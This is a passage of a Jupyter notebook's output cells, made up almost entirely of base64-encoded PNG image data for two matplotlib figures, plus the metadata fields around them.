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\n",
"text/plain": [
"<matplotlib.figure.Figure at 0x7fc7a7258630>"
]
},
"metadata": {},
"output_type": "display_data"
},
{
"data": {
"image/png": "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